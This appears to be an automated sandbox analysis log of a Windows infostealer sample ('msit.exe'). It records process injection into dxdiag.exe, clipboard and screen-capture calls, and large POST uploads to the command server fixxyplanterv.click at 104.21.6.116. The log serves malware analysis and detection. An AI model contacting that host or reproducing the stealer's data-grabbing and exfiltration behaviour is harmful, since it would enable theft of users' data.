              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=XFO1FXWQ01JOUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1221Host: fixxyplanterv.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=SWU054U4IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 586097Host: fixxyplanterv.click
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 80Host: fixxyplanterv.click
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: fixxyplanterv.click
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: fixxyplanterv.click
              Source: shi95F5.tmp.0.drString found in binary or memory: http://.css
              Source: shi95F5.tmp.0.drString found in binary or memory: http://.jpg
              Source: msit.msi.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: msit.msi.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
              Source: msit.msi.0.drString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA.crt0
              Source: dxdiag.exe, 00000007.00000003.1697639523.0000000002F4A000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1681864403.0000000002F3F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microX
              Source: dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: msit.msi.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
              Source: dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: msit.msi.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
              Source: msit.msi.0.drString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA.crl0E
              Source: msit.msi.0.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
              Source: msit.msi.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
              Source: dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: msit.msi.0.drString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA.crl0K
              Source: msit.msi.0.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
              Source: dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: shi95F5.tmp.0.drString found in binary or memory: http://html4/loose.dtd
              Source: dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: msit.msi.0.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: msit.msi.0.drString found in binary or memory: http://ocsp.digicert.com0K
              Source: msit.msi.0.drString found in binary or memory: http://ocsp.digicert.com0N
              Source: msit.msi.0.drString found in binary or memory: http://ocsp.digicert.com0O
              Source: dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: msit.msi.0.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: dxdiag.exe, 00000007.00000003.1636864869.00000000051C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: dxdiag.exe, 00000007.00000003.1638111835.0000000005246000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696491991400800003.2&ci=1696491991993.
              Source: dxdiag.exe, 00000007.00000003.1651908747.000000000523D000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1652145664.0000000005241000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1662253193.0000000005243000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696491991400800003.1&ci=1696491991993.12791&cta
              Source: dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: dxdiag.exe, 00000007.00000003.1638111835.0000000005246000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpg
              Source: dxdiag.exe, 00000007.00000003.1651908747.000000000523D000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1652145664.0000000005241000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1662253193.0000000005243000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: dxdiag.exe, 00000007.00000003.1697924723.0000000002F73000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1676263312.0000000002F73000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000002.1708428233.0000000002EFF000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1662361641.0000000002F65000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1697639523.0000000002F72000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000002.1708678569.0000000002F72000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000002.1708428233.0000000002EF1000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1676727815.0000000002F72000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1676142921.0000000002F72000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1681864403.0000000002F72000.00000004.00000020.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1672261175.0000000002F75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fixxyplanterv.click/
              Source: dxdiag.exe, 00000007.00000002.1708678569.0000000002F72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fixxyplanterv.click/3
              Source: dxdiag.exe, 00000007.00000002.1708428233.0000000002ECC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fixxyplanterv.click/LL
              Source: dxdiag.exe, 00000007.00000002.1708678569.0000000002F4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fixxyplanterv.click/api
              Source: dxdiag.exe, 00000007.00000003.1672261175.0000000002F75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fixxyplanterv.click/apiDBcD
              Source: dxdiag.exe, 00000007.00000002.1708428233.0000000002EFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fixxyplanterv.click/apiK
              Source: dxdiag.exe, 00000007.00000003.1676727815.0000000002F72000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fixxyplanterv.click/apijBqD
              Source: dxdiag.exe, 00000007.00000003.1681695049.000000000525C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fixxyplanterv.click:443/api
              Source: dxdiag.exe, 00000007.00000003.1651908747.000000000523D000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1652145664.0000000005241000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1662253193.0000000005243000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbW
              Source: dxdiag.exe, 00000007.00000003.1638111835.0000000005246000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
              Source: dxdiag.exe, 00000007.00000003.1637786015.00000000054D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: dxdiag.exe, 00000007.00000003.1637786015.00000000054D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: dxdiag.exe, 00000007.00000003.1651908747.000000000523D000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1652145664.0000000005241000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1662253193.0000000005243000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
              Source: msit.msi.0.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: dxdiag.exe, 00000007.00000003.1615267305.00000000051E9000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615331678.00000000051E6000.00000004.00000800.00020000.00000000.sdmp, dxdiag.exe, 00000007.00000003.1615421665.00000000051E6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: dxdiag.exe, 00000007.00000003.1638111835.0000000005246000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
              Source: dxdiag.exe, 00000007.00000003.1637700500.00000000052BA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: dxdiag.exe, 00000007.00000003.1637786015.00000000054D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
              Source: dxdiag.exe, 00000007.00000003.1637786015.00000000054D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
              Source: dxdiag.exe, 00000007.00000003.1637786015.00000000054D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: dxdiag.exe, 00000007.00000003.1637786015.00000000054D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownHTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49711 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49715 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.6.116:443 -> 192.168.2.8:49719 version: TLS 1.2
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004303F0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_004303F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004303F0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,7_2_004303F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_00431262 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,7_2_00431262
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\599bb2.msiJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA16F.tmpJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA1CE.tmpJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA20D.tmpJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA23D.tmpJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA28C.tmpJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA2BC.tmpJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA2EC.tmpJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{15630F35-AF86-45E7-B3CF-07A0AC07CAF6}Jump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA416.tmpJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIA455.tmpJump to behavior
              Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIA16F.tmpJump to behavior
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004358707_2_00435870
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004159717_2_00415971
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004089207_2_00408920
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0043CA107_2_0043CA10
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0040AAE07_2_0040AAE0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_00420B107_2_00420B10
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0040E4587_2_0040E458
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0043D4007_2_0043D400
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004254807_2_00425480
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004355307_2_00435530
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004386407_2_00438640
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0043A7F47_2_0043A7F4
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004227B07_2_004227B0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0043D0407_2_0043D040
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004148607_2_00414860
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004338757_2_00433875
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004258007_2_00425800
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004258207_2_00425820
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0042683C7_2_0042683C
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0041D0C07_2_0041D0C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004230C07_2_004230C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004238F07_2_004238F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004039507_2_00403950
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0040F1167_2_0040F116
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0040E1227_2_0040E122
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0040B1247_2_0040B124
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004281C07_2_004281C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0040D9D67_2_0040D9D6
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0042A9D57_2_0042A9D5
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004061E07_2_004061E0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004231F67_2_004231F6
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004059807_2_00405980
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004369807_2_00436980
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004148607_2_00414860
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0043BA707_2_0043BA70
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004122007_2_00412200
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_00426A107_2_00426A10
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004192197_2_00419219
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0042AAC67_2_0042AAC6
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004092D07_2_004092D0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0042AAD77_2_0042AAD7
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004082F07_2_004082F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004362F07_2_004362F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0041DA807_2_0041DA80
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0042AA8A7_2_0042AA8A
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_00438A907_2_00438A90
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004273657_2_00427365
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0040FB717_2_0040FB71
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004043007_2_00404300
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0041BB207_2_0041BB20
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0041C3307_2_0041C330
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_00436BE47_2_00436BE4
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_00402B907_2_00402B90
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004074507_2_00407450
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_00404C507_2_00404C50
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004344637_2_00434463
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004154607_2_00415460
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_00434C707_2_00434C70
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_00427C0F7_2_00427C0F
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0041D4C07_2_0041D4C0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0043CCF07_2_0043CCF0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0041EC807_2_0041EC80
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0042E4807_2_0042E480
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0042456F7_2_0042456F
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_00421D737_2_00421D73
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_00438D707_2_00438D70
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_00417D747_2_00417D74
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_00424DD07_2_00424DD0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_00405E407_2_00405E40
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0041BE717_2_0041BE71
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004066707_2_00406670
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0040EE707_2_0040EE70
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0041CE007_2_0041CE00
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_00434ED07_2_00434ED0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004216E07_2_004216E0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0043B6F07_2_0043B6F0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_00415FA17_2_00415FA1
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004177427_2_00417742
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_00402F507_2_00402F50
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0041676A7_2_0041676A
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_00416F7C7_2_00416F7C
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004197107_2_00419710
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004117127_2_00411712
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0040C72B7_2_0040C72B
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004097307_2_00409730
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_004277E07_2_004277E0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0043B7E07_2_0043B7E0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0042779B7_2_0042779B
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_00415FA17_2_00415FA1
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0041A7A07_2_0041A7A0
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_0042456F7_2_0042456F
              Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\MSI96A2.tmp D3614D7BECE53E0D408E31DA7D9B0FF2F7285A7DD544C778847ED0C5DED5D52F
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: String function: 00407FE0 appears 50 times
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: String function: 00414850 appears 77 times
              Source: msit.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
              Source: shi95F5.tmp.0.drBinary string: \Device\NameResTrk\RecordNrtCloneOpenPacket
              Source: msit.exeBinary or memory string: 2*.vbp
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@12/42@1/1
              Source: C:\Windows\SysWOW64\dxdiag.exeCode function: 7_2_00435870 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,7_2_00435870
              Source: C:\Users\user\Desktop\msit.exeFile created: C:\Users\user\AppData\Roaming\msitJump to behavior
              Source: C:\Users\user\Desktop\msit.exeFile created: C:\Users\user\AppData\Local\Temp\shi95F5.tmpJump to behavior
              Source: msit.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\msit.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\msit.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
